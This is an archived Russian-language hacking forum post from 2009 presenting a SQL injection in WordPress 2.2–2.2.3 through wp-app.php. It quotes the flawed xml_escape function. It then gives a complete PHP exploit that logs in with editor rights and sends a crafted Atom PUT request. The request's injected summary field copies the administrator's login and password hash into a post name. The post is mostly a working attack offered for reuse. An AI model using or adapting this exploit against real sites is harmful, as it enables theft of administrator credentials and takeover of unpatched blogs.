Показать сообщение отдельно

wp-app sql injection
  #9  
Старый 27.05.2009, 20:23
M4g
Участник форума
Регистрация: 08.05.2007
Сообщений: 164
Провел на форуме:
466673

Репутация: 784
Отправить сообщение для M4g с помощью ICQ
По умолчанию wp-app sql injection

9. wp-app sql injection (2.2<=WordPress<=2.2.3)

Ну и на закуску, пропущенная всеми древняя уязвимость от Alexander Concha (зато уязвимая функция и сейчас присутствует в вордпрессе без изменений
1. ./wp-includes/atomlib.php
Код:
function xml_escape($string)
{
	 return str_replace(array('&','"',"'",'<','>'), 
		array('&','"',''','<','>'), 
		$string );
}
2. Эксплойт с правами edit_posts
Код:
<?php
$site='lamer.com';
$path='/wp223/wp-app.php?action=/post/1'; //тут айди поста
$user='editor'; //логин на блоге
$passwd='editor'; //пароль на блоге 

$auth=base64_encode($user.":".$passwd);
$fp = fsockopen($site, 80, $errno, $errstr, 30);	
$data='<feed>
    <entry>
        <id>http://lamer.com/wp223/2009/03/01/hello-world/</id>
        <title type="html">test\</title>
        <summary type="html">,post_name=(select concat(user_login,0x3a,user_pass) from wp_users where ID=1) where id=1/*</summary>       
    </entry>
</feed>';

$out = "PUT $path HTTP/1.1\r\n";
$out .= "Host: $site\r\n";
$out .= "Content-Type: application/atom+xml\r\n";
$out .= "Connection: Close\r\n";
$out .= "User-Agent: Opera\r\n";
$out .= "Authorization: Basic $auth\r\n";
$out .= "Content-Length: ".strlen($data)."\r\n\r\n";  
fwrite($fp, $out.$data);
fclose($fp);
?>

Последний раз редактировалось M4g; 27.05.2009 в 20:29..
 
Ответить с цитированием